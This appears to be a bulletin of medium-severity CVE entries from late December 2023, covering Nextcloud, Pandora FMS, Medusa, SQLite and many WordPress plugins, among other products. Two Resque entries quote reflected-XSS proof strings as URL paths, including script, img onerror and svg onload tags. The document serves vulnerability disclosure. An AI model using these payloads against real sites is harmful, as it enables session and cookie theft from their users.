honor — magic_os Some Honor products are affected by type confusion vulnerability, successful exploitation could cause information leak. 2023-12-29 4.6 CVE-2023-51428
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — magic_os     Some Honor products are affected by signature management vulnerability, successful exploitation could cause the forged system file to overwrite the correct system file. 2023-12-29 4 CVE-2023-23435
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — magic_ui Some Honor products are affected by out of bounds read vulnerability, successful exploitation could cause information leak. 2023-12-29 6 CVE-2023-23441
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — magic_ui Some Honor products are affected by incorrect privilege assignment vulnerability, successful exploitation could cause information leak. 2023-12-29 4.4 CVE-2023-51430
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — magic_ui Some Honor products are affected by type confusion vulnerability, successful exploitation could cause denial of service. 2023-12-29 4 CVE-2023-6939
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — nth-an00 Some Honor products are affected by file writing vulnerability, successful exploitation could cause code execution 2023-12-29 6.5 CVE-2023-23424
3836d913-7555-4dd0-a509-f5667fdf5fe4
honor — nth-an00 Some Honor products are affected by signature management vulnerability, successful exploitation could cause the forged system file to overwrite the correct system file. 2023-12-29 4 CVE-2023-23433
3836d913-7555-4dd0-a509-f5667fdf5fe4
ibm — aix IBM AIX 7.2 and 7.3 could allow a non-privileged local user to exploit a vulnerability in the AIX SMB client to cause a denial of service. IBM X-Force ID: 267963. 2023-12-22 5.5 CVE-2023-45165
psirt@us.ibm.com
psirt@us.ibm.com
instipod — duouniversalkeycloakauthenticator An information disclosure vulnerability exists in the challenge functionality of instipod DuoUniversalKeycloakAuthenticator 1.0.7 plugin. A specially crafted HTTP request can lead to a disclosure of sensitive information. A user login to Keycloak using DuoUniversalKeycloakAuthenticator plugin triggers this vulnerability. 2023-12-23 4.5 CVE-2023-49594
talos-cna@cisco.com
talos-cna@cisco.com
kylinsoft — kylin-system-updater A vulnerability classified as critical has been found in KylinSoft kylin-system-updater up to 2.0.5.16-0k2.33. Affected is an unknown function of the file /usr/share/kylin-system-updater/SystemUpdater/UpgradeStrategiesDbus.py of the component com.kylin.systemupgrade Service. The manipulation of the argument SetDownloadspeedMax leads to os command injection. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248940. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-25 5.3 CVE-2023-7093
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
mediawiki — mediawiki An issue was discovered in MediaWiki before 1.35.14, 1.36.x through 1.39.x before 1.39.6, and 1.40.x before 1.40.2. In includes/logging/RightsLogFormatter.php, group-*-member messages can result in XSS on Special:log/rights. 2023-12-22 6.1 CVE-2023-51704
cve@mitre.org
metersphere — metersphere MeterSphere is a one-stop open source continuous testing platform. Prior to 2.10.10-lts, the authenticated attackers can update resources which don’t belong to him if the resource ID is known. This issue if fixed in 2.10.10-lts. There are no known workarounds. 2023-12-28 4.3 CVE-2023-50267
security-advisories@github.com
micropython — micropython A vulnerability, which was classified as critical, has been found in MicroPython 1.21.0/1.22.0-preview. Affected by this issue is the function poll_set_add_fd of the file extmod/modselect.c. The manipulation leads to use after free. The exploit has been disclosed to the public and may be used. The patch is identified as 8b24aa36ba978eafc6114b6798b47b7bfecdca26. It is recommended to apply a patch to fix this issue. VDB-249158 is the identifier assigned to this vulnerability. 2023-12-29 5.5 CVE-2023-7152
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
moxa — iologik_e1200
 		 A weak cryptographic algorithm vulnerability has been identified in ioLogik E1200 Series firmware versions v3.3 and prior. This vulnerability can help an attacker compromise the confidentiality of sensitive data. This vulnerability may lead an attacker to get unexpected authorization. 2023-12-23 6.5 CVE-2023-5962
psirt@moxa.com
msgpackr — msgpackr msgpackr is a fast MessagePack NodeJS/JavaScript implementation. Prior to 1.10.1, when decoding user supplied MessagePack messages, users can trigger stuck threads by crafting messages that keep the decoder stuck in a loop. The fix is available in v1.10.1. Exploits seem to require structured cloning, replacing the 0x70 extension with your own (that throws an error or does something other than recursive referencing) should mitigate the issue. 2023-12-28 6.8 CVE-2023-52079
security-advisories@github.com
security-advisories@github.com
netentsec — ns-asg_application_security_gateway A vulnerability classified as problematic was found in Netentsec NS-ASG Application Security Gateway 6.3. Affected by this vulnerability is an unknown functionality of the file /protocol/nsasg6.0.tgz. The manipulation leads to information disclosure. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248941 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-25 5.3 CVE-2023-7094
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
nextcloud — nextcloud The Nextcloud iOS Files app allows users of iOS to interact with Nextcloud, a self-hosted productivity platform. Prior to version 4.9.2, the application can be used without providing the 4-digit PIN code. Nextcloud iOS Files app should be upgraded to 4.9.2 to receive the patch. No known workarounds are available. 2023-12-22 4.3 CVE-2023-49790
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
nextcloud — server/enterprise_server Nextcloud Server provides data storage for Nextcloud, an open source cloud platform. In Nextcloud Server prior to versions 26.0.9 and 27.1.4; as well as Nextcloud Enterprise Server prior to versions 23.0.12.13, 24.0.12.9, 25.0.13.4, 26.0.9, and 27.1.4; when an attacker manages to get access to an active session of another user via another way, they could delete and modify workflows by sending calls directly to the API bypassing the password confirmation shown in the UI. Nextcloud Server versions 26.0.9 and 27.1.4 and Nextcloud Enterprise Server versions 23.0.12.13, 24.0.12.9, 25.0.13.4, 26.0.9, and 27.1.4 contain a patch for this issue. No known workarounds are available. 2023-12-22 5.4 CVE-2023-49791
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
nextcloud — server/enterprise_server Nextcloud Server provides data storage for Nextcloud, an open source cloud platform. In Nextcloud Server prior to versions 26.0.9 and 27.1.4; as well as Nextcloud Enterprise Server prior to versions 23.0.12.13, 24.0.12.9, 25.0.13.4, 26.0.9, and 27.1.4; when a (reverse) proxy is configured as trusted proxy the server could be tricked into reading a wrong remote address for an attacker, allowing them executing authentication attempts than intended. Nextcloud Server versions 26.0.9 and 27.1.4 and Nextcloud Enterprise Server versions 23.0.12.13, 24.0.12.9, 25.0.13.4, 26.0.9, and 27.1.4 contain a patch for this issue. No known workarounds are available. 2023-12-22 5.3 CVE-2023-49792
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
own_health_record — own_health_record
 		 A vulnerability was found in MdAlAmin-aol Own Health Record 0.1-alpha/0.2-alpha/0.3-alpha/0.3.1-alpha. It has been rated as problematic. This issue affects some unknown processing of the file includes/logout.php. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. Upgrading to version 0.4-alpha is able to address this issue. The patch is named 58b413aa40820b49070782c786c526850ab7748f. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-249191. 2023-12-30 4.3 CVE-2018-25096
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
pandora_fms — pandora_fms Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Pandora FMS on all allows Cross-Site Scripting (XSS). It was possible to execute malicious JS code on Visual Consoles. This issue affects Pandora FMS: from 700 through 774. 2023-12-29 6.1 CVE-2023-44089
security@pandorafms.com
pandora_fms — pandora_fms Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Pandora FMS on all allows SQL Injection. Arbitrary SQL queries were allowed to be executed using any account with low privileges. This issue affects Pandora FMS: from 700 through 774. 2023-12-29 5.9 CVE-2023-44088
security@pandorafms.com
pexip — pexip_infinity Pexip Infinity before 32 allows Webapp1 XSS via preconfigured links. 2023-12-25 6.1 CVE-2023-37225
cve@mitre.org
pexip — virtual_meeting_rooms In Pexip VMR self-service portal before 3, the same SSH host key is used across different customers’ installations, which allows authentication bypass. 2023-12-25 5.3 CVE-2023-40236
cve@mitre.org
phpgurukul — hospital_management_system A vulnerability, which was classified as problematic, was found in PHPGurukul Hospital Management System 1.0. This affects an unknown part of the file registration.php. The manipulation of the argument First Name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249357 was assigned to this vulnerability. 2023-12-30 4.3 CVE-2023-7173
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
phpgurukul — online_notes_sharing_system A vulnerability was found in PHPGurukul Online Notes Sharing System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /user/add-notes.php. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248741 was assigned to this vulnerability. 2023-12-22 5.4 CVE-2023-7054
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
phpgurukul — online_notes_sharing_system A vulnerability classified as problematic has been found in PHPGurukul Online Notes Sharing System 1.0. Affected is an unknown function of the file /user/profile.php of the component Contact Information Handler. The manipulation of the argument mobilenumber leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-248742 is the identifier assigned to this vulnerability. 2023-12-22 5.4 CVE-2023-7055
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
phpgurukul — online_notes_sharing_system A vulnerability was found in PHPGurukul Online Notes Sharing System 1.0. It has been classified as problematic. This affects an unknown part of the file /user/profile.php. The manipulation of the argument name leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248739. 2023-12-22 4.3 CVE-2023-7052
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
poly — multiple_products
 		 A vulnerability classified as problematic was found in Poly CCX 400, CCX 600, Trio 8800 and Trio C60. This vulnerability affects unknown code of the component HTTP Header Handler. The manipulation of the argument Cookie leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249256. 2023-12-29 5.3 CVE-2023-4463
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
poly — trio_8800 A vulnerability was found in Poly Trio 8800 7.2.6.0019 and classified as critical. Affected by this issue is some unknown functionality of the component Test Automation Mode. The manipulation leads to backdoor. It is possible to launch the attack on the physical device. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249260. 2023-12-29 6.2 CVE-2023-4467
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
poly — trio_8800/trio_c60 A vulnerability was found in Poly Trio 8800 and Trio C60. It has been classified as problematic. This affects an unknown part of the component Poly Lens Management Cloud Registration. The manipulation leads to missing authorization. It is possible to launch the attack on the physical device. The exploit has been disclosed to the public and may be used. The identifier VDB-249261 was assigned to this vulnerability. 2023-12-29 4.3 CVE-2023-4468
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
pymedusa — medusa Medusa is an automatic video library manager for TV shows. Versions prior to 1.0.19 are vulnerable to unauthenticated blind server-side request forgery (SSRF). The `testDiscord` request handler in `medusa/server/web/home/handler.py` does not validate the user-controlled `discord_webhook` variable and passes it to the `notifiers.discord_notifier.test_notify` method, then `_notify_discord` and finally `_send_discord_msg` method, which sends a POST request to the user-controlled URL on line 64 in `/medusa/notifiers/discord.py`, which leads to a blind server-side request forgery. This issue allows for crafting POST requests on behalf of the Medusa server. Version 1.0.19 contains a fix for the issue. 2023-12-22 5.3 CVE-2023-50258
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
pymedusa — medusa Medusa is an automatic video library manager for TV shows. Versions prior to 1.0.19 are vulnerable to unauthenticated blind server-side request forgery (SSRF). The `testslack` request handler in `medusa/server/web/home/handler.py` does not validate the user-controlled `slack_webhook` variable and passes it to the `notifiers.slack_notifier.test_notify` method, then `_notify_slack` and finally `_send_slack` method, which sends a POST request to the user-controlled URL on line 103 in `/medusa/notifiers/slack.py`, which leads to a blind server-side request forgery (SSRF). This issue allows for crafting POST requests on behalf of the Medusa server. Version 1.0.19 contains a fix for the issue. 2023-12-22 5.3 CVE-2023-50259
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
red_hat — multiple_products A flaw was found in shadow-utils. When asking for a new password, shadow-utils asks the password twice. If the password fails on the second attempt, shadow-utils fails in cleaning the buffer used to store the first entry. This may allow an attacker with enough access to retrieve the password from the memory. 2023-12-27 4.7 CVE-2023-4641
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
red_hat — multiple_products
 		 A vulnerability was found in systemd-resolved. This issue may allow systemd-resolved to accept records of DNSSEC-signed domains even when they have no signature, allowing man-in-the-middles (or the upstream DNS resolver) to manipulate records. 2023-12-23 5.9 CVE-2023-7008
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
resque — resque Resque is a Redis-backed Ruby library for creating background jobs, placing them on multiple queues, and processing them later. The following paths in resque-web have been found to be vulnerable to reflected XSS: “/failed/?class=<script>alert(document.cookie)</script>” and “/queues/><img src=a onerror=alert(document.cookie)>”. This issue has been patched in version 2.2.1. 2023-12-22 6.3 CVE-2023-50725
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
resque — resque Resque is a Redis-backed Ruby library for creating background jobs, placing them on multiple queues, and processing them later. Reflected XSS issue occurs when /queues is appended with /”><svg%20onload=alert(domain)>. This issue has been patched in version 2.6.0. 2023-12-22 6.3 CVE-2023-50727
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
sentry — symbolicator Symbolicator is a service used in Sentry. Starting in Symbolicator version 0.3.3 and prior to version 21.12.1, an attacker could make Symbolicator send GET HTTP requests to arbitrary URLs with internal IP addresses by using an invalid protocol. The responses of those requests could be exposed via Symbolicator’s API. In affected Sentry instances, the data could be exposed through the Sentry API and user interface if the attacker has a registered account. The issue has been fixed in Symbolicator release 23.12.1, Sentry self-hosted release 23.12.1, and has already been mitigated on sentry.io on December 18, 2023. If updating is not possible, some other mitigations are available. One may disable JS processing by toggling the option `Allow JavaScript Source Fetching` in `Organization Settings > Security & Privacy` and/or disable all untrusted public repositories under `Project Settings > Debug Files`. Alternatively, if JavaScript and native symbolication are not required, disable Symbolicator completely in `config.yml`. 2023-12-22 4.3 CVE-2023-51451
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
shifuml — shifu A vulnerability has been found in ShifuML shifu 0.12.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file src/main/java/ml/shifu/shifu/core/DataPurifier.java of the component Java Expression Language Handler. The manipulation of the argument FilterExpression leads to code injection. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249151. 2023-12-29 5 CVE-2023-7148
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
snowflakedb — snowflake-connector-net The Snowflake .NET driver provides an interface to the Microsoft .NET open source software framework for developing applications. Snowflake recently received a report about a vulnerability in the Snowflake Connector .NET where the checks against the Certificate Revocation List (CRL) were not performed where the insecureMode flag was set to false, which is the default setting. The vulnerability affects versions between 2.0.25 and 2.1.4 (inclusive). Snowflake fixed the issue in version 2.1.5. 2023-12-22 6 CVE-2023-51662
security-advisories@github.com
security-advisories@github.com
sourcecodester — free_and_open_source_inventory_management_system A vulnerability, which was classified as critical, was found in SourceCodester Free and Open Source Inventory Management System 1.0. This affects an unknown part of the file /ample/app/action/edit_product.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249177 was assigned to this vulnerability. 2023-12-29 6.3 CVE-2023-7155
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
sourcecodester — free_and_open_source_inventory_management_system A vulnerability was found in SourceCodester Free and Open Source Inventory Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /app/ajax/sell_return_data.php. The manipulation of the argument columns[0][data] leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249179. 2023-12-29 6.3 CVE-2023-7157
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
sourcecodester — medicine_tracking_system A vulnerability, which was classified as critical, has been found in SourceCodester Medicine Tracking System 1.0. This issue affects some unknown processing of the file /classes/Master.php? f=save_medicine. The manipulation of the argument id/name/description leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249095. 2023-12-28 6.3 CVE-2023-7123
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
sourcecodester — medicine_tracking_system A vulnerability was found in SourceCodester Medicine Tracking System 1.0. It has been rated as critical. This issue affects some unknown processing. The manipulation of the argument page leads to path traversal: ‘../filedir’. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249137 was assigned to this vulnerability. 2023-12-28 6.3 CVE-2023-7134
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
sourcecodester — school_visitor_log_e-book A vulnerability was found in SourceCodester School Visitor Log e-Book 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file log-book.php. The manipulation of the argument Full Name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248750 is the identifier assigned to this vulnerability. 2023-12-22 5.4 CVE-2023-7059
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
sqlite — sqlite3 A vulnerability was found in SQLite SQLite3 up to 3.43.0 and classified as critical. This issue affects the function sessionReadRecord of the file ext/session/sqlite3session.c of the component make alltest Handler. The manipulation leads to heap-based buffer overflow. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-248999. 2023-12-29 5.5 CVE-2023-7104
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
sudo — sudo
 		 A flaw was found in sudo in the handling of ipa_hostname, where ipa_hostname from /etc/sssd/sssd.conf was not propagated in sudo. Therefore, it leads to privilege mismanagement vulnerability in applications, where client hosts retain privileges even after retracting them. 2023-12-23 6.6 CVE-2023-7090
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
talent_software — ecop Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Talent Software ECOP allows Reflected XSS. This issue affects ECOP: before 32255. 2023-12-28 6.1 CVE-2023-4672
iletisim@usom.gov.tr
tongda — office_anywhere
 		 A vulnerability has been found in Tongda OA 2017 up to 11.9 and classified as critical. Affected by this vulnerability is an unknown functionality of the file general/project/proj/delete.php. The manipulation of the argument PROJ_ID_STR leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-249367. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-30 5.5 CVE-2023-7180
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
uniway — uw-302vp A vulnerability was found in Uniway UW-302VP 2.0. It has been rated as problematic. This issue affects some unknown processing of the file /boaform/wlan_basic_set.cgi of the component Admin Web Interface. The manipulation of the argument wlanssid/password leads to cross-site request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248939. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-24 4.3 CVE-2023-7092
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
weiye-jing — datax-web A vulnerability, which was classified as critical, has been found in WeiYe-Jing datax-web 2.1.2. Affected by this issue is some unknown functionality of the file /api/log/killJob of the component HTTP POST Request Handler. The manipulation of the argument processId leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249086 is the identifier assigned to this vulnerability. 2023-12-27 6.3 CVE-2023-7116
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
wordpress — wordpress The Widget Settings Importer/Exporter Plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the wp_ajax_import_widget_dataparameter AJAX action in versions up to, and including, 1.5.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with subscriber-level permissions and above to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2023-12-23 5.4 CVE-2020-36769
security@wordfence.com
security@wordfence.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in Gesundheit Bewegt GmbH Zippy. This issue affects Zippy: from n/a through 1.6.5. 2023-12-28 6.6 CVE-2023-36381
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Themeum WP Crowdfunding allows Stored XSS. This issue affects WP Crowdfunding: from n/a through 2.1.6. 2023-12-28 6.5 CVE-2023-50859
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in TMS Booking for Appointments and Events Calendar – Amelia allows Stored XSS. This issue affects Booking for Appointments and Events Calendar – Amelia: from n/a through 1.0.85. 2023-12-28 6.5 CVE-2023-50860
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Darren Cooney WordPress Infinite Scroll – Ajax Load More allows Stored XSS. This issue affects WordPress Infinite Scroll – Ajax Load More: from n/a through 6.1.0.1. 2023-12-28 6.5 CVE-2023-50874
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Automattic WordPress.Com Editing Toolkit allows Stored XSS. This issue affects WordPress.Com Editing Toolkit: from n/a through 3.78784. 2023-12-29 6.5 CVE-2023-50879
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in The BuddyPress Community BuddyPress allows Stored XSS. This issue affects BuddyPress: from n/a through 11.3.1. 2023-12-29 6.5 CVE-2023-50880
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in AAM Advanced Access Manager – Restricted Content, Users & Roles, Enhanced Security and More allows Stored XSS. This issue affects Advanced Access Manager – Restricted Content, Users & Roles, Enhanced Security and More: from n/a through 6.9.15. 2023-12-29 6.5 CVE-2023-50881
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in The Beaver Builder Team Beaver Builder – WordPress Page Builder allows Stored XSS. This issue affects Beaver Builder – WordPress Page Builder: from n/a through 2.7.2. 2023-12-29 6.5 CVE-2023-50889
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Zoho Forms Form plugin for WordPress – Zoho Forms allows Stored XSS. This issue affects Form plugin for WordPress – Zoho Forms: from n/a through 3.0.1. 2023-12-29 6.5 CVE-2023-50891
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Brizy.Io Brizy – Page Builder allows Stored XSS. This issue affects Brizy – Page Builder: from n/a through 2.4.29. 2023-12-29 6.5 CVE-2023-51396
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Brainstorm Force WP Remote Site Search allows Stored XSS. This issue affects WP Remote Site Search: from n/a through 1.0.4. 2023-12-29 6.5 CVE-2023-51397
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in WPFactory Back Button Widget allows Stored XSS. This issue affects Back Button Widget: from n/a through 1.6.3. 2023-12-29 6.5 CVE-2023-51399
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Aleksandar Uroševi? Stock Ticker allows Stored XSS. This issue affects Stock Ticker: from n/a through 3.23.4. 2023-12-29 6.5 CVE-2023-51541
audit@patchstack.com
wordpress — wordpress Unofficial Mobile BankID Integration for WordPress lets users employ Mobile BankID to authenticate themselves on your WordPress site. Prior to 1.0.1, WP-Mobile-BankID-Integration is affected by a vulnerability classified as a Deserialization of Untrusted Data vulnerability, specifically impacting scenarios where an attacker can manipulate the database. If unauthorized actors gain access to the database, they could exploit this vulnerability to execute object injection attacks. This could lead to unauthorized code execution, data manipulation, or data exfiltration within the WordPress environment. Users of the plugin should upgrade to version 1.0.1 (or later), where the serialization and deserialization of OrderResponse objects have been switched out to an array stored as JSON. A possible workaround for users unable to upgrade immediately is to enforce stricter access controls on the database, ensuring that only trusted and authorized entities can modify data. Additionally, implementing monitoring tools to detect unusual database activities could help identify and mitigate potential exploitation attempts. 2023-12-27 6.4 CVE-2023-51700
security-advisories@github.com
security-advisories@github.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in BoxyStudio Booked – Appointment Booking for WordPress | Calendars. This issue affects Booked – Appointment Booking for WordPress | Calendars: from n/a before 2.4.4. 2023-12-28 5.3 CVE-2022-36399
audit@patchstack.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in VeronaLabs WP SMS – Messaging & SMS Notification for WordPress, WooCommerce, GravityForms, etc. This issue affects WP SMS – Messaging & SMS Notification for WordPress, WooCommerce, GravityForms, etc: from n/a through 6.0.4. 2023-12-28 5.3 CVE-2023-27447
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in ibericode HTML Forms allows Stored XSS. This issue affects HTML Forms: from n/a through 1.3.28. 2023-12-28 5.9 CVE-2023-50836
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Bill Minozzi Disable Json API, Login Lockdown, XMLRPC, Pingback, Stop User Enumeration Anti Hacker Scan. This issue affects Disable Json API, Login Lockdown, XMLRPC, Pingback, Stop User Enumeration Anti Hacker Scan: from n/a through 4.34. 2023-12-28 5.4 CVE-2023-50858
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in InspireUI MStore API. This issue affects MStore API: from n/a through 4.10.1. 2023-12-29 5.4 CVE-2023-50878
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in weForms weForms – Easy Drag & Drop Contact Form Builder For WordPress allows Stored XSS. This issue affects weForms – Easy Drag & Drop Contact Form Builder For WordPress: from n/a through 1.6.17. 2023-12-29 5.9 CVE-2023-50896
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Bright Plugins Block IPs for Gravity Forms. This issue affects Block IPs for Gravity Forms: from n/a through 1.0.1. 2023-12-29 5.4 CVE-2023-51358
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Ginger Plugins Sticky Chat Widget: Click to chat, SMS, Email, Messages, Call Button, Live Chat and Live Support Button allows Stored XSS. This issue affects Sticky Chat Widget: Click to chat, SMS, Email, Messages, Call Button, Live Chat and Live Support Button: from n/a through 1.1.8. 2023-12-29 5.9 CVE-2023-51361
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Bit Assist Chat Widget: WhatsApp Chat, Facebook Messenger Chat, Telegram Chat Bubble, Line Messenger, Live Chat Support Chat Button, WeChat, SMS, Call Button, Customer Support Button with floating Chat Widget allows Stored XSS. This issue affects Chat Widget: WhatsApp Chat, Facebook Messenger Chat, Telegram Chat Bubble, Line Messenger, Live Chat Support Chat Button, WeChat, SMS, Call Button, Customer Support Button with floating Chat Widget: from n/a through 1.1.9. 2023-12-29 5.9 CVE-2023-51371
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in HasThemes HashBar – WordPress Notification Bar allows Stored XSS. This issue affects HashBar – WordPress Notification Bar: from n/a through 1.4.1. 2023-12-29 5.9 CVE-2023-51372
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in ZeroBounce ZeroBounce Email Verification & Validation allows Stored XSS. This issue affects ZeroBounce Email Verification & Validation: from n/a through 1.0.11. 2023-12-29 5.9 CVE-2023-51374
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Rise Themes Rise Blocks – A Complete Gutenberg Page Builder. This issue affects Rise Blocks – A Complete Gutenberg Page Builder: from n/a through 3.1. 2023-12-29 5.4 CVE-2023-51378
audit@patchstack.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Senol Sahin AI Power: Complete AI Pack – Powered by GPT-4. This issue affects AI Power: Complete AI Pack – Powered by GPT-4: from n/a through 1.8.2. 2023-12-29 5.3 CVE-2023-51527
audit@patchstack.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in impleCode Product Catalog Simple. This issue affects Product Catalog Simple: from n/a through 1.7.6. 2023-12-29 5.3 CVE-2023-51687
audit@patchstack.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in impleCode eCommerce Product Catalog Plugin for WordPress. This issue affects eCommerce Product Catalog Plugin for WordPress: from n/a through 3.3.26. 2023-12-29 5.3 CVE-2023-51688
audit@patchstack.com
wordpress — wordpress The Divi theme for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin’s ‘et_pb_text’ shortcode in all versions up to, and including, 4.23.1 due to insufficient input sanitization and output escaping on user supplied custom field data. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2023-12-23 5.4 CVE-2023-6744
security@wordfence.com
security@wordfence.com
